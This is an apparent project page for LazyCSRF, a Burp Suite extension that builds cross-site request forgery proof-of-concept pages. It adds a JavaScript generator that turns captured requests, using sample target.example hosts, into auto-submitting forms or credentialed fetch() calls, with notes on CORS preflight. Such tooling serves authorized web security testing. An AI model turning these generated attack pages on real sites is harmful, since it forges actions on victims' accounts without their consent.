lazyCSRF v0.0.2 - useful CSRF PoC generator


itsMe

LazyCSRF

LazyCSRF is a more useful CSRF PoC generator that runs on Burp Suite.

Motivation

Burp Suite is an intercepting HTTP proxy, and it is the de facto tool for performing web application security testing. The feature of Burp Suite that I like the most is Generate CSRF PoC. However, it does not support JSON parameters. It also builds the PoC around an HTML <form>, which can only submit GET and POST, so it cannot send PUT/DELETE requests. In addition, multibyte characters that display correctly in Burp Suite itself are often garbled in the generated CSRF PoC. Those were the motivations for creating LazyCSRF.

Features

    Support for JSON parameters (for example, a request to a JSON API)
    Support for PUT/DELETE (sent from script rather than a form, so they only work when the target's CORS policy is permissive enough to pass the preflight)
    Support for displaying multibyte characters (like Japanese) without garbling
    Generates CSRF PoCs in Burp Suite Community Edition (Burp's built-in generator is Professional-only; LazyCSRF also works in Professional Edition)

The difference in the display of multibyte characters

The following image shows the difference in the display of multibyte characters between Burp's CSRF PoC generator and LazyCSRF. LazyCSRF generates the CSRF PoC without garbling multibyte characters. This holds only when the characters already display correctly in Burp Suite itself; LazyCSRF cannot recover characters that Burp has already decoded incorrectly.
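The following is an added example, not LazyCSRF's own code, that shows what the feature list and the multibyte section above describe: a minimal CSRF PoC generator that turns a captured request into an HTML page. Classic urlencoded GET/POST requests become an auto-submitting <form>, which is not subject to CORS at all; JSON bodies and PUT/DELETE become a fetch() call with credentials, which the browser only delivers cross-origin if the target's CORS policy passes the preflight. The output declares UTF-8 so multibyte values survive as-is. The host names, cookie value and request bodies are constructed samples, and the header classification is a simplified subset of the CORS rules.

```javascript
// Added example (not LazyCSRF's own code): a minimal CSRF PoC generator.
// Classic urlencoded GET/POST -> auto-submitting <form> (no CORS involved).
// JSON body or PUT/DELETE     -> fetch() with credentials, which the browser
//                                withholds unless the target's CORS policy
//                                answers the preflight permissively.

// CORS "simple request" rules (simplified subset): a safelisted method and,
// if a Content-Type is set, a safelisted value. Anything else triggers an
// OPTIONS preflight before the real request is sent.
const SAFELISTED_METHODS = new Set(["GET", "HEAD", "POST"]);
const SAFELISTED_CONTENT_TYPES = new Set([
  "application/x-www-form-urlencoded", "multipart/form-data", "text/plain",
]);
const SAFELISTED_HEADERS = new Set(["accept", "accept-language", "content-language", "content-type"]);
// Headers the browser sets itself; fetch() refuses to let a page set them, so
// they are dropped. The victim's real cookies come from credentials: "include".
const FORBIDDEN_HEADERS = new Set([
  "host", "cookie", "content-length", "origin", "referer", "connection", "user-agent", "accept-encoding",
]);

function mimeType(value) {
  return value.split(";")[0].trim().toLowerCase();
}

function needsPreflight(method, headers) {
  if (!SAFELISTED_METHODS.has(method.toUpperCase())) return true;
  for (const [name, value] of Object.entries(headers)) {
    const lower = name.toLowerCase();
    if (!SAFELISTED_HEADERS.has(lower)) return true;
    if (lower === "content-type" && !SAFELISTED_CONTENT_TYPES.has(mimeType(value))) return true;
  }
  return false;
}

function sendableHeaders(headers) {
  return Object.fromEntries(
    Object.entries(headers).filter(([k]) => !FORBIDDEN_HEADERS.has(k.toLowerCase())));
}

function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// JS string literal for embedding inside <script>. JSON.stringify leaves
// non-ASCII characters alone (no garbling); "</" is broken up so a value
// containing "</script>" cannot close the script element early.
function jsLiteral(value) {
  return JSON.stringify(value).replace(/<\//g, "<\\/");
}

function formPoc(url, method, body) {
  const inputs = [...new URLSearchParams(body)]
    .map(([k, v]) => `<input type="hidden" name="${escapeHtml(k)}" value="${escapeHtml(v)}">`)
    .join("\n    ");
  return `<form id="csrf" action="${escapeHtml(url)}" method="${escapeHtml(method)}">
    ${inputs}
  </form>
  <script>document.getElementById("csrf").submit();</script>`;
}

function fetchPoc(url, method, headers, body) {
  return `<script>
  fetch(${jsLiteral(url)}, {
    method: ${jsLiteral(method)},
    credentials: "include",
    mode: "cors",
    headers: ${jsLiteral(headers)},
    body: ${body === "" ? "null" : jsLiteral(body)},
  });
  </script>`;
}

// Input shape mirrors what Burp shows: method, URL, header map, raw body.
function generateCsrfPoc({ url, method = "POST", headers = {}, body = "" }) {
  method = method.toUpperCase();
  const sendable = sendableHeaders(headers);
  const ct = Object.entries(sendable).find(([k]) => k.toLowerCase() === "content-type");
  const mime = ct ? mimeType(ct[1]) : null;
  const formOk = (method === "GET" || method === "POST") &&
    (mime === null || mime === "application/x-www-form-urlencoded");
  let inner, note;
  if (formOk) {
    inner = formPoc(url, method, body);
    note = "form submission: not subject to CORS, always delivered";
  } else {
    inner = fetchPoc(url, method, sendable, body);
    note = needsPreflight(method, sendable)
      ? "preflighted fetch: delivered only if the target's CORS policy allows it"
      : "simple fetch: delivered without preflight, response unreadable";
  }
  return `<!DOCTYPE html>
<html>
<head><meta charset="utf-8"><title>CSRF PoC</title></head>
<body>
  <!-- ${note} -->
  ${inner}
</body>
</html>`;
}

// Constructed sample requests (hypothetical hosts and cookie value).
const SAMPLE_FORM_REQUEST = {
  url: "https://target.example/account/email",
  method: "POST",
  headers: { "Host": "target.example", "Content-Type": "application/x-www-form-urlencoded" },
  body: "email=a%40b.test&name=%E5%B1%B1%E7%94%B0", // name=山田, percent-encoded UTF-8
};
const SAMPLE_JSON_REQUEST = {
  url: "https://api.target.example/v1/profile",
  method: "PUT",
  headers: { "Host": "api.target.example", "Cookie": "session=abc123", "Content-Type": "application/json" },
  body: JSON.stringify({ displayName: "日本語テスト", bio: "</script>" }),
};
```

Calling generateCsrfPoc(SAMPLE_JSON_REQUEST) yields a page whose comment line records that the request is preflighted; that comment is the practical caveat from the feature list: a PUT with a JSON body reaches the server only if the target answers the OPTIONS preflight with Access-Control-Allow-Origin for the attacker's origin and Access-Control-Allow-Credentials: true. A POST with a text/plain body, by contrast, is classified as a simple fetch and is delivered regardless of the target's CORS headers.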
